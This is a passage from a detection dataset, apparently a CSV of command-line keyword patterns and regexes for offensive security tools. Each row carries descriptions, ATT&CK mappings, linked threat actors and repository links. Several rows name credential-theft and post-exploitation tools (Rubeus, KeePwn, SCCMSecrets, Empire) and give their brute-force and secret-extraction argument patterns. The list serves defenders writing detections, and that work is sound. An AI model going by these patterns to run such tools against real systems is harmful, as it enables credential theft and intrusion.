- T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE 
STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/nettitude/RunOF","1","0","N/A","N/A","10","10","145","21","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z","423" "* -bootkey *",".{0,1000}\s\-bootkey\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","424" "* 
Brc4LdapSentinelParser*",".{0,1000}\sBrc4LdapSentinelParser.{0,1000}","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","0","N/A","N/A","5","4","328","56","2024-02-23T15:36:24Z","2022-05-10T17:41:53Z","427" "* broadcast-ataoe-discover.nse*",".{0,1000}\sbroadcast\-ataoe\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","428" "* broadcast-avahi-dos.nse*",".{0,1000}\sbroadcast\-avahi\-dos\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","429" "* broadcast-bjnp-discover.nse*",".{0,1000}\sbroadcast\-bjnp\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","430" "* broadcast-db2-discover.nse*",".{0,1000}\sbroadcast\-db2\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","431" "* broadcast-dhcp6-discover.nse*",".{0,1000}\sbroadcast\-dhcp6\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","432" "* broadcast-dhcp-discover.nse*",".{0,1000}\sbroadcast\-dhcp\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","433" "* broadcast-dns-service-discovery.nse*",".{0,1000}\sbroadcast\-dns\-service\-discovery\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","434" "* broadcast-dropbox-listener.nse*",".{0,1000}\sbroadcast\-dropbox\-listener\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","435" "* broadcast-eigrp-discovery.nse*",".{0,1000}\sbroadcast\-eigrp\-discovery\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","436" "* broadcast-hid-discoveryd.nse*",".{0,1000}\sbroadcast\-hid\-discoveryd\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","437" "* broadcast-igmp-discovery.nse*",".{0,1000}\sbroadcast\-igmp\-discovery\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","438" "* broadcast-jenkins-discover.nse*",".{0,1000}\sbroadcast\-jenkins\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","439" "* broadcast-listener.nse*",".{0,1000}\sbroadcast\-listener\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","440" "* broadcast-ms-sql-discover.nse*",".{0,1000}\sbroadcast\-ms\-sql\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","441" "* broadcast-netbios-master-browser.nse*",".{0,1000}\sbroadcast\-netbios\-master\-browser\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","442" "* broadcast-networker-discover.nse*",".{0,1000}\sbroadcast\-networker\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","443" "* broadcast-novell-locate.nse*",".{0,1000}\sbroadcast\-novell\-locate\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","444" "* broadcast-ospf2-discover.nse*",".{0,1000}\sbroadcast\-ospf2\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","445" "* broadcast-pc-anywhere.nse*",".{0,1000}\sbroadcast\-pc\-anywhere\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","446" "* broadcast-pc-duo.nse*",".{0,1000}\sbroadcast\-pc\-duo\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","447" "* broadcast-pim-discovery.nse*",".{0,1000}\sbroadcast\-pim\-discovery\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","448" "* broadcast-ping.nse*",".{0,1000}\sbroadcast\-ping\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","449" "* broadcast-pppoe-discover.nse*",".{0,1000}\sbroadcast\-pppoe\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","450" "* broadcast-rip-discover.nse*",".{0,1000}\sbroadcast\-rip\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","451" "* broadcast-ripng-discover.nse*",".{0,1000}\sbroadcast\-ripng\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","452" "* broadcast-sonicwall-discover.nse*",".{0,1000}\sbroadcast\-sonicwall\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","453" "* broadcast-sybase-asa-discover.nse*",".{0,1000}\sbroadcast\-sybase\-asa\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","454" "* broadcast-tellstick-discover.nse*",".{0,1000}\sbroadcast\-tellstick\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","455" "* broadcast-upnp-info.nse*",".{0,1000}\sbroadcast\-upnp\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","456" "* broadcast-versant-locate.nse*",".{0,1000}\sbroadcast\-versant\-locate\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","457" "* broadcast-wake-on-lan.nse*",".{0,1000}\sbroadcast\-wake\-on\-lan\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","458" "* broadcast-wpad-discover.nse*",".{0,1000}\sbroadcast\-wpad\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","459" "* broadcast-wsdd-discover.nse*",".{0,1000}\sbroadcast\-wsdd\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","460" "* broadcast-xdmcp-discover.nse*",".{0,1000}\sbroadcast\-xdmcp\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","461" "* bropper.py*",".{0,1000}\sbropper\.py.{0,1000}","offensive_tool_keyword","bropper","An automatic Blind ROP exploitation tool ","T1068 - T1059.003 - T1140","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/Hakumarachi/Bropper","1","0","N/A","N/A","7","3","201","19","2023-06-09T12:40:05Z","2023-01-20T14:09:19Z","462" "* BrtoVenomRenames.sh*",".{0,1000}\sBrtoVenomRenames\.sh.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","463" "* brute * /password*",".{0,1000}\sbrute\s.{0,1000}\s\/password.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. 
It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","464" "* --bruteforce *.kdbx*",".{0,1000}\s\-\-bruteforce\s.{0,1000}\.kdbx.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Orange-Cyberdefense/KeePwn","1","0","N/A","N/A","10","5","486","47","2024-12-12T12:47:07Z","2023-01-27T13:59:38Z","465" "* BruteForce(*",".{0,1000}\sBruteForce\(.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","APT33","Persistence","https://github.com/sensepost/ruler","1","0","N/A","N/A","10","10","2222","362","2024-06-10T11:03:07Z","2016-08-18T15:05:13Z","466" "* --bruteforce-range *",".{0,1000}\s\-\-bruteforce\-range\s.{0,1000}","offensive_tool_keyword","SCCMSecrets","SCCMSecrets.py aims at exploiting SCCM policies distribution for credentials harvesting - initial access and lateral movement.","T1555 - T1078 - T1070 - T1021","TA0006 - TA0008 - TA0001","N/A","N/A","Lateral Movement","https://github.com/synacktiv/SCCMSecrets","1","0","N/A","N/A","8","3","208","22","2024-12-17T14:29:39Z","2024-08-14T09:45:44Z","467" "* Bruteforcing bad characters*",".{0,1000}\sBruteforcing\sbad\scharacters.{0,1000}","offensive_tool_keyword","sgn","polymorphic encoder used in to obfuscate 
payloads","T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/EgeBalci/sgn","1","0","N/A","N/A","8","10","1681","224","2024-02-22T17:35:59Z","2019-10-30T10:20:01Z","468" "* -brute-opnums *",".{0,1000}\s\-brute\-opnums\s.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","469" "* --brute-ratel*",".{0,1000}\s\-\-brute\-ratel.{0,1000}","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","0","N/A","N/A","5","4","328","56","2024-02-23T15:36:24Z","2022-05-10T17:41:53Z","470" "* Brutesploit*",".{0,1000}\sBrutesploit.{0,1000}","offensive_tool_keyword","BruteSploit","BruteSploit is a collection of method for automated Generate. Bruteforce and Manipulation wordlist with interactive shell. 
